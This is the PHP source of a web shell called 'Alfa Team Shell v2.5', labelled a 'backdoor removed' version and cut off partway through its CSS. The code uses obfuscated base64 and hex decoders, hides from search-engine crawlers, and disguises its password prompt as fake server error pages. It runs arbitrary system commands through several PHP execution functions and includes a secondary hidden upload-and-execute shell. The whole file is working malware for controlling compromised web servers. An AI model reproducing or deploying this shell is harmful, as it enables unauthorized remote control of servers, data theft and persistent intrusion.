Alfa Team Shell v2.5[Safe Version]

1. <?php
2.  
3.  
4. //Alfa Team v2.5 Backdoor Removed Shell
5. //Orignal Has backdoor in it
6. //Surf Safetly
7. //N!nj@ X - Team Cyber Assassins..
8. $GLOBALS['Alfa_User'] = 'admin';
9.  
10.  
11. //username
12. $GLOBALS['Alfa_Pass'] = '56aed7e7485ff03d5605b885b86e947e';
13.  
14.  
15. //md5(password) - default pass: alfa
16. $GLOBALS['Alfa_Protect_Shell'] = '0';
17.  
18.  
19. //1 - 0
20. $GLOBALS['Alfa_Login_Page'] = 'gui';
21.  
22.  
23. //gui - 500 - 403 - 404
24. $GLOBALS['Alfa_Show_Icons'] = '1';
25.  
26.  
27. //1 - 0
28.  
29. if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;
30.  
31.  
32. $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
33.  
34.  
35. $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
36.  
37.  
38. $ac = 0;
39.  
40.  
41. $enc = '';
42.  
43.  
44. $tmp_arr = array();
45.  
46.  
47. if(!$data){return $data;
48.  
49.  
50. }do{$o1 = charCodeAt($data, $i++);
51.  
52.  
53. $o2 = charCodeAt($data, $i++);
54.  
55.  
56. $o3 = charCodeAt($data, $i++);
57.  
58.  
59. $bits = $o1 << 16 | $o2 << 8 | $o3;
60.  
61.  
62. $h1 = $bits >> 18 & 0x3f;
63.  
64.  
65. $h2 = $bits >> 12 & 0x3f;
66.  
67.  
68. $h3 = $bits >> 6 & 0x3f;
69.  
70.  
71. $h4 = $bits & 0x3f;
72.  
73.  
74. $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
75.  
76.  
77. } while ($i < strlen($data));
78.  
79.  
80. $enc = implode($tmp_arr, '');
81.  
82.  
83. $r = (strlen($data) % 3);
84.  
85.  
86. return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
87.  
88.  
89. }function charCodeAt($data, $char){ return ord(substr($data, $char, 1));
90.  
91.  
92. }function charAt($data, $char){return substr($data, $char, 1);
93.  
94.  
95. }}else{function __ZW5jb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'en'.'co'.'de';
96.  
97.  
98. return $b($s);
99.  
100.  
101. }}if(!function_exists('b'.'a'.'se'.'6'.'4_'.'d'.'ec'.'ode')){function __ZGVjb2Rlcg($input){if(empty($input))return;
102.  
103.  
104. $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
105.  
106.  
107. $chr1 = $chr2 = $chr3 = "";
108.  
109.  
110. $enc1 = $enc2 = $enc3 = $enc4 = "";
111.  
112.  
113. $i = 0;
114.  
115.  
116. $output = "";
117.  
118.  
119. $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
120.  
121.  
122. do{$enc1 = strpos($keyStr, substr($input, $i++, 1));
123.  
124.  
125. $enc2 = strpos($keyStr, substr($input, $i++, 1));
126.  
127.  
128. $enc3 = strpos($keyStr, substr($input, $i++, 1));
129.  
130.  
131. $enc4 = strpos($keyStr, substr($input, $i++, 1));
132.  
133.  
134. $chr1 = ($enc1 << 2) | ($enc2 >> 4);
135.  
136.  
137. $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
138.  
139.  
140. $chr3 = (($enc3 & 3) << 6) | $enc4;
141.  
142.  
143. $output = $output . chr((int) $chr1);
144.  
145.  
146. if ($enc3 != 64) {$output = $output . chr((int) $chr2);
147.  
148.  
149. }if ($enc4 != 64) {$output = $output . chr((int) $chr3);
150.  
151.  
152. }$chr1 = $chr2 = $chr3 = "";
153.  
154.  
155. $enc1 = $enc2 = $enc3 = $enc4 = "";
156.  
157.  
158. }while($i < strlen($input));
159.  
160.  
161. return $output;
162.  
163.  
164. }}else{function __ZGVjb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'de'.'co'.'de';
165.  
166.  
167.  
168. return $b($s);
169.  
170.  
171. }}
172. $阿尔法词=十六进制转换('666736736265687075726134636f5f746e646978');
173.  
174. $函数存在=$阿尔法词{0}.$阿尔法词{8}.$阿尔法词{16}.$阿尔法词{12}.$阿尔法词{15}.$阿尔法词{18}.$阿尔法词{13}.$阿尔法词{16}.$阿尔法词{14}.$阿尔法词{5}.$阿尔法词{19}.$阿尔法词{18}.$阿尔法词{3}.$阿尔法词{15}.$阿尔法词{3};
175.  
176. function 十六进制转换($十六进制){$串='';
177.  
178. for($计数=0;
179.  
180. $计数<strlen($十六进制);
181.  
182. $计数+=2)$串.=chr(hexdec(substr($十六进制,$计数,2)));
183.  
184. return $串;
185.  
186. }function 编码器($串){return __ZGVjb2Rlcg($串);
187.  
188. }function 随机($串){return ord($串);
189.  
190. }function 内容($串){return @file_get_contents($串);
191.  
192. }if(!$函数存在("阿尔法功能启动")){function 阿尔法功能启动($阿尔法变量的一个){$阿尔法变量的一个=编码器($阿尔法变量的一个);
193.  
194. $阿尔法功能启动=0;
195.  
196. $阿尔法两个变量=0;
197.  
198. $阿尔法变三=0;
199.  
200. $阿尔法四个变量=(随机($阿尔法变量的一个[1])<<8)+随机($阿尔法变量的一个[2]);
201.  
202. $阿尔法五个变量=3;
203.  
204. $阿尔法六个变量=0;
205.  
206. $阿尔法七个变量=16;
207.  
208. $阿尔法变八="";
209.  
210. $阿尔法九变=strlen($阿尔法变量的一个);
211.  
212. $阿尔法变量十=__FILE__;
213.  
214. $阿尔法变量十=内容($阿尔法变量十);
215.  
216. $阿尔法变量十一=0;
217.  
218. preg_match(编码器("LyhwcmludHxzcHJpbnR8ZWNobykv"),$阿尔法变量十,$阿尔法变量十一);
219.  
220. for(;
221.  
222. $阿尔法五个变量<$阿尔法九变;
223.  
224. ){if(count($阿尔法变量十一)) exit;
225.  
226. if($阿尔法七个变量==0){$阿尔法四个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<8);
227.  
228. $阿尔法四个变量+=随机($阿尔法变量的一个[$阿尔法五个变量++]);
229.  
230. $阿尔法七个变量=16;
231.  
232. }if($阿尔法四个变量&0x8000){$阿尔法功能启动=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<4);
233.  
234. $阿尔法功能启动+=(随机($阿尔法变量的一个[$阿尔法五个变量])>>4);
235.  
236. if($阿尔法功能启动){$阿尔法两个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])&0x0F)+3;
237.  
238. for($阿尔法变三=0;
239.  
240. $阿尔法变三<$阿尔法两个变量;
241.  
242. $阿尔法变三++)$阿尔法变八[$阿尔法六个变量+$阿尔法变三]=$阿尔法变八[$阿尔法六个变量-$阿尔法功能启动+$阿尔法变三];
243.  
244. $阿尔法六个变量+=$阿尔法两个变量;
245.  
246. }else{$阿尔法两个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<8);
247.  
248. $阿尔法两个变量+=随机($阿尔法变量的一个[$阿尔法五个变量++])+16;
249.  
250. for($阿尔法变三=0;
251.  
252. $阿尔法变三<$阿尔法两个变量;
253.  
254. $阿尔法变八[$阿尔法六个变量+$阿尔法变三++]=$阿尔法变量的一个[$阿尔法五个变量]);
255.  
256. $阿尔法五个变量++;
257.  
258. $阿尔法六个变量+=$阿尔法两个变量;
259.  
260. }}else $阿尔法变八[$阿尔法六个变量++]=$阿尔法变量的一个[$阿尔法五个变量++];
261.  
262. $阿尔法四个变量<<=1;
263.  
264. $阿尔法七个变量--;
265.  
266. if($阿尔法五个变量==$阿尔法九变){$阿尔法变量十=implode("",$阿尔法变八);
267.  
268. $阿尔法变量十="?".">".$阿尔法变量十;
269.  
270. return $阿尔法变量十;
271.  
272.  
273. }}}}
274. ?><?php if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");
275. if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');
276. exit;
277. }} if(!isset($GLOBALS['Alfa_User']))exit('$GLOBALS[\'Alfa_User\']');
278. if(!isset($GLOBALS['Alfa_Pass']))exit('$GLOBALS[\'Alfa_Pass\']');
279. if(!isset($GLOBALS['Alfa_Protect_Shell']))exit('$GLOBALS[\'Alfa_Protect_Shell\']');
280. if(!isset($GLOBALS['Alfa_Login_Page']))exit('$GLOBALS[\'Alfa_Login_Page\']');
281. if(!isset($GLOBALS['Alfa_Show_Icons']))exit('$GLOBALS[\'Alfa_Show_Icons\']');
282. $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
283. $config = array('AlfaUser' => $GLOBALS['Alfa_User'],'AlfaPass' => $GLOBALS['Alfa_Pass'],'AlfaProtectShell' => $GLOBALS['Alfa_Protect_Shell'],'AlfaLoginPage' => $GLOBALS['Alfa_Login_Page']);
284. @session_start();
285. if($config['AlfaProtectShell']){ $Eform='<form method="post"><input style="margin:0;
286. background-color:#fff;
287. border:1px solid #fff;
288. " type="password" name="password"></form>';
289. if($config['AlfaLoginPage'] == 'gui'){ if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
290. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
291. @header('location: '.$_SERVER["PHP_SELF"]);
292. } echo '
293. <style>
294. body{background: black;
295. }
296. #loginbox { font-size:11px;
297. color:green;
298. right:85px;
299. width:1200px;
300. height:200px;
301. border-radius:5px;
302. -moz-boder-radius:5px;
303. position:fixed;
304. top:250px;
305. }
306. #loginbox td { border-radius:5px;
307. font-size:11px;
308. }
309. </style>
310. <title>~ ALFA TEaM SHELL-v2.5 ~</title><center>
311. <center><img style="border-radius:100px;
312. " width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
313. <div id=loginbox><p><font face="verdana,arial" size=-1>
314. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
315. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;
316. padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM SHELL-v2.5 ~</b></font></th></tr>
317. <tr><td bgcolor="black" style="padding:5">
318. <form method="post">
319. <input type="hidden" name="action" value="login">
320. <input type="hidden" name="hide" value="">
321. <center><table>
322. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';
323. }"></td></tr>
324. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';
325. "></td></tr>
326. <tr><td><font face="verdana,arial" size=-1>&nbsp;
327. </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
328. </div><br /></center>';
329. exit;
330. } }elseif($config['AlfaLoginPage']=='500'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
331. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
332. header('location: '.$_SERVER["PHP_SELF"]);
333. } echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$_SERVER["SERVER_SIGNATURE"].'</body></html>'.$Eform;
334. exit;
335. } }elseif($config['AlfaLoginPage']=='403'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
336. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
337. header('location: '.$_SERVER["PHP_SELF"]);
338. } echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$_SERVER['SERVER_SIGNATURE']."</body></html>".$Eform;
339. exit;
340. } }elseif($config['AlfaLoginPage']=='404'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
341. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
342. header('location: '.$_SERVER["PHP_SELF"]);
343. } echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$_SERVER['SERVER_SIGNATURE']."</body></html>".$Eform;
344. exit;
345. } } } if(isset($_POST['ajax'])){ function AlfaNum(){ $args = func_get_args();
346. $alfax = array();
347. $find = array();
348. for($i=1;
349. $i<=10;
350. $i++){ $alfax[] = $i;
351. } foreach($args as $arg){ $find[] = $arg;
352. } echo '<script>';
353. foreach($alfax as $alfa){ if(in_array($alfa,$find)) continue;
354. echo 'alfa'.$alfa."_=";
355. } echo '""</script>';
356. }} function alfaEx($in,$re=false){ $out='';
357. if($re)$in=$in." 2>&1";
358. if(function_exists('exec')){ @exec($in,$out);
359. $out = @join("\n",$out);
360. }elseif(function_exists('passthru')) { ob_start();
361. @passthru($in);
362. $out = ob_get_clean();
363. }elseif(function_exists('system')){ ob_start();
364. @system($in);
365. $out = ob_get_clean();
366. } elseif (function_exists('shell_exec')) { $out = shell_exec($in);
367. }elseif(is_resource($f = @popen($in,"r"))){ $out = "";
368. while(!@feof($f)) $out .= fread($f,1024);
369. pclose($f);
370. }elseif(function_exists('proc_open')){ $pipes = array();
371. $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
372. $out=@stream_get_contents($pipes[1]);
373. }elseif(class_exists('COM')){ $alfaWs = new COM('WScript.shell');
374. $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
375. $stdout = $exec->StdOut();
376. $out=$stdout->ReadAll();
377. } return $out;
378. } if(isset($_GET["solevisible"])){ @error_reporting(E_ALL ^ E_NOTICE);
379. echo '<html>';
380. echo "<title>Solevisible Hidden Shell</title>";
381. echo "<body bgcolor=#000000>";
382. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
383. $safe_mode = @ini_get('safe_mode');
384. if($safe_mode){$r = "<b style='color: red'>On</b>";
385. }else{$r = "<b style='color: green'>Off</b>";
386. } echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
387. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
388. echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
389. echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
390. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
391. echo"<font color=#7CFC00>Disabled functions : </font>";
392. $disfun = @ini_get('disable_functions');
393. if(empty($disfun)){$disfun = '<font color="green">NONE</font>';
394. } echo"<font color=red>";
395. echo "$disfun";
396. echo"</font><br>";
397. echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
398. echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
399. echo '<hr><center><form onSubmit="this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));
400. " action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
401. echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="_upl" type="submit" id="_upl" value="Upload"></p></form></center>';
402. if(@$_POST['_upl'] == "Upload"){ if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;
403. )</font></a><font color="#7CFC00"></b><br><br></center>';
404. } else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>';
405. } } echo '<hr><form onSubmit="this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));
406. " method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="Execute" value="Execute" type="submit"><br></form>
407. <hr><pre>';
408. if($_POST['command_solevisible']){ $solevisible = __ZGVjb2Rlcg($_POST['command_solevisible']);
409. echo alfaEx($solevisible);
410. } echo'</pre>
411. </body></html>';
412. exit;
413. } @error_reporting(E_ALL ^ E_NOTICE);
414. @session_start();
415. @ini_set('error_log',NULL);
416. @ini_set('log_errors',0);
417. @ini_set('max_execution_time',0);
418. @ini_set('magic_quotes_runtime', 0);
419. @set_time_limit(0);
420. if(function_exists('set_magic_quotes_runtime')){ @set_magic_quotes_runtime(0);
421. } foreach($_POST as $key => $value){ if(is_array($_POST[$key])){ $i=0;
422. foreach($_POST[$key] as $f) { $f = trim(str_replace(' ', '+',$f));
423. $_POST[$key][$i] = __ZGVjb2Rlcg($f);
424. $i++;
425. } }else{ $value = trim(str_replace(' ', '+',$value));
426. $_POST[$key] = __ZGVjb2Rlcg($value);
427. } } $default_action = 'FilesMan';
428. $default_use_ajax = true;
429. $default_charset = 'Windows-1251';
430. if(strtolower(substr(PHP_OS,0,3))=="win") $GLOBALS['sys']='win';
431. else $GLOBALS['sys']='unix';
432. $GLOBALS['home_cwd'] = @getcwd();
433. if(isset($_POST['c'])){ @chdir($_POST['c']);
434. } $GLOBALS['cwd'] = @getcwd();
435. if($GLOBALS['sys'] == 'win'){ $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
436. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
437. } if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
438. function alfahead(){ if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;
439. }}$temp = tempnam($GLOBALS['__file_path'], '');
440. if (file_exists($temp)) {unlink($temp);
441. return dirname($temp);
442. }return null;
443. }}
444. define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
445. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
446. if(!isset($_POST['ajax'])){ function Alfa_GetDisable_Function(){ $disfun = @ini_get('disable_functions');
447. if(empty($disfun))return('<font color="#0F0">All Functions Accessible</font>');
448. $s = explode(',',$disfun);
449. $s = array_unique($s);
450. $i=0;
451. $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
452. foreach($s as $d){ $d=trim($d);
453. if(empty($d))continue;
454. if(!function_exists($d)){ if(in_array($d,$func)){ $dis .= $d." | ";
455. }$i++;
456. } } return('<font color="red">'.$dis.'</font><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');
457. ">See More Disabled Functions ('.$i.')</a>');
458. } function AlfaNum(){ $args = func_get_args();
459. $alfax = array();
460. $find = array();
461. for($i=1;
462. $i<=10;
463. $i++){ $alfax[] = $i;
464. } foreach($args as $arg){ $find[] = $arg;
465. } echo '<script>';
466. foreach($alfax as $alfa){ if(in_array($alfa,$find)) continue;
467. echo 'alfa'.$alfa."_=";
468. } echo '""</script>';
469. } if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
470. $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
471. $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
472. $totalSpace = $totalSpace?$totalSpace:1;
473. $on="<font color=#0F0> ON </font>";
474. $of="<font color=red> OFF </font>";
475. $none="<font color=#0F0> NONE </font>";
476. if(function_exists('ssh2_connect')) $ssh2=$on;
477. else $ssh2=$of;
478. if(function_exists('curl_version')) $curl=$on;
479. else $curl=$of;
480. if(function_exists('mysql_get_client_info')) $mysql=$on;
481. else $mysql=$of;
482. if(function_exists('mssql_connect')) $mssql=$on;
483. else $mssql=$of;
484. if(function_exists('pg_connect')) $pg=$on;
485. else $pg=$of;
486. if(function_exists('oci_connect')) $or=$on;
487. else $or=$of;
488. if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions');
489. else $disfun="All Functions Enable";
490. if(@ini_get('safe_mode')) $safe_modes="<font color=red>ON</font>";
491. else $safe_modes="<font color=#0F0 >OFF</font>";
492. if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir');
493. else $open_b=$none;
494. if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir');
495. else $safe_exe=$none;
496. if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir');
497. else $safe_include=$none;
498. if(!function_exists('posix_getegid')) { $user = @get_current_user();
499. $uid = @getmyuid();
500. $gid = @getmygid();
501. $group = "?";
502. }else{ $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array();
503. $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array();
504. $user = $uid['name'];
505. $uid = $uid['uid'];
506. $group = $gid['name'];
507. $gid = $gid['gid'];
508. } $cwd_links = '';
509. $path = explode("/", $GLOBALS['cwd']);
510. $n=count($path);
511. for($i=0;
512. $i<$n-1;
513. $i++) { $cwd_links .= "<a href='javascript:void(0);
514. ' onclick='g(\"FilesMan\",\"";
515. for($j=0;
516. $j<=$i;
517. $j++) $cwd_links .= $path[$j].'/';
518. $cwd_links .= "\")'>".$path[$i]."/</a>";
519. } $drives = "";
520. foreach(range('a','z') as $drive) if(@is_dir($drive.':\\')) $drives .= '<a href="javascript:void(0);
521. " onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
522. $csscode =' -moz-animation-name: spin;
523. -moz-animation-iteration-count: infinite;
524. -moz-animation-timing-function: linear;
525. -moz-animation-duration: 1s;
526. -webkit-animation-name: spin;
527. -webkit-animation-iteration-count: infinite;
528. -webkit-animation-timing-function: linear;
529. -webkit-animation-duration: 1s;
530. -ms-animation-name: spin;
531. -ms-animation-iteration-count: infinite;
532. -ms-animation-timing-function: linear;
533. -ms-animation-duration: 1s;
534. animation-name: spin;
535. animation-iteration-count: infinite;
536. animation-timing-function: linear;
537. animation-duration: 1s;
538. ';
539. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
540. <html xmlns="http://www.w3.org/1999/xhtml">
541. <head>
542. <meta http-equiv="Content-Type" content="text/html;
543. charset=utf-8" />
544. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
545. <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
546. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM SHELL-v2.5 ::..</title>
547. <style type="text/css">
548. keyframes spin {from {transform: rotate(0deg);
549. }to{transform: rotate(360deg);
550. }}
551. @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);
552. }to {-webkit-transform: rotate(360deg);
553. }}
554. @-moz-keyframes spin {from {-moz-transform: rotate(0deg);
555. }to {-moz-transform: rotate(360deg);
556. }}
557. @-ms-keyframes spin {from {-ms-transform: rotate(0deg);
558. }to {-ms-transform: rotate(360deg);
559. }}
560. #alfaloader{'.$csscode.'width:100px;
561. height:100px;
562. }
563. #a_loader{'.$csscode.'width:150px;
564. height:150px;
565. position:fixed;
566. z-index:999999;
567. top: 42%;
568. left: 45%;
569. display:none;
570. }
571. .ajaxarea{border:1px solid #0E304A;
572. color:#67ABDF}#up_bar{background-color:red;
573. width:0;
574. height:2px;
575. display:none;
576. position:fixed;
577. z-index:100000}#hidden_sh{background-color:#0E304A;
578. text-align:center;
579. position:absolute;
580. right:0;
581. left:90%;
582. border-bottom-left-radius:2em}.alert_green{color:#0F0;
583. font-family:"Comic Sans MS";
584. font-size:small;
585. text-decoration:none}.whole{background-color:#000;
586. background-image:url(http://solevisible.com/images/alfabg.png);
587. background-position:center;
588. background-attachment:fixed;
589. background-repeat:no-repeat}.header{height:auto;
590. width:auto;
591. border:7px solid #0E304A;
592. color:#67ABDF;
593. font-size:12px;
594. font-family:Verdana,Geneva,sans-serif}.header a{color:#0F0;
595. text-decoration:none}.header a:hover{color:#FFF;
596. text-decoration:none}span{font-weight:bolder;
597. color:#FFF}.txtfont{font-family:"Comic Sans MS";
598. font-size:small;
599. color:#fff;
600. display:inline-block}.txtfont_header{font-family:"Comic Sans MS";
601. font-size:large;
602. display:inline-block;
603. color:#59cc33}.tbltxt{font-family:"Comic Sans MS";
604. color:#fff;
605. font-size:small;
606. display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;
607. background:transparent;
608. box-shadow:0 0 4px #0E304A;
609. border-radius:4px;
610. height:20px;
611. width:250px;
612. text-overflow:ellipsis;
613. white-space:nowrap;
614. cursor:pointer;
615. display:inline-block;
616. overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;
617. border:1px solid #27979B;
618. -webkit-border-radius:4px;
619. -moz-border-radius:4px;
620. border-radius:4px;
621. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
622. -moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;
623. padding-left:10px}.inputfile span{color:#25ff00;
624. width:90px;
625. min-height:2em;
626. display:inline-block;
627. text-overflow:ellipsis;
628. white-space:nowrap;
629. overflow:hidden;
630. vertical-align:top;
631. float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');
632. background-repeat:no-repeat;
633. background-position:float;
634. height:100%;
635. width:109px;
636. color:#fff;
637. background-color:#0E304A;
638. display:inline-block;
639. float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{border:1px solid #0E304A;
640. background:transparent;
641. box-shadow:0 0 4px #0E304A;
642. -webkit-border-radius:4px;
643. -moz-border-radius:4px;
644. border-radius:100px;
645. -webkit-box-shadow:#555 0 0 4px;
646. -moz-box-shadow:#555 0 0 4px;
647. background-color:#000;
648. color:green;
649. border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;
650. border:1px solid #27979B;
651. -webkit-border-radius:4px;
652. -moz-border-radius:4px;
653. border-radius:100px;
654. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
655. -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['Alfa_Show_Icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;
656. cursor:pointer;
657. position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";
658. display:inline-block;
659. width:14px;
660. height:13px;
661. position:absolute;
662. background-color:#aaa;
663. box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;
664. padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";
665. background-color:#0E304A;
666. background-image:url('.__showicon('alfamini').');
667. background-repeat:no-repeat;
668. background-position:50% 50%;
669. background-size:14px 14px;
670. border:1px solid #0F0;
671. box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;
672. color:#FFF;
673. width:auto;
674. border-right-width:7px;
675. border-left-width:7px;
676. height:auto;
677. font-size:12px;
678. font-weight:700;
679. border-top-width:0;
680. border-color:#0E304A;
681. border-style:solid}.whole #meunlist ul{text-align:center;
682. list-style-type:none;
683. margin:0;
684. padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;
685. padding:0;
686. display:inline}.whole #meunlist a{font-family:arial,sans-serif;
687. font-size:14px;
688. text-decoration:none;
689. font-weight:700;
690. color:#fff;
691. clear:both;
692. width:100px;
693. margin-right:-6px;
694. border-right-width:1px;
695. border-right-style:solid;
696. border-right-color:#FFF;
697. padding:3px 15px}.whole #meunlist a:hover{color:#000;
698. background:#646464}.foot{font-family:Verdana,Geneva,sans-serif;
699. margin:0;
700. padding:0;
701. width:100%;
702. text-align:center;
703. font-size:12px;
704. color:#0E304A;
705. border-right-width:7px;
706. border-left-width:7px;
707. border-bottom-width:7px;
708. border-bottom-style:solid;
709. border-right-style:solid;
710. border-right-style:solid;
711. border-left-style:solid;
712. border-color:#0E304A}#text{text-align:center}input[type=submit]{background-image:url('.__showicon('btn').');
713. background-repeat:no-repeat;
714. background-position:50% 50%;
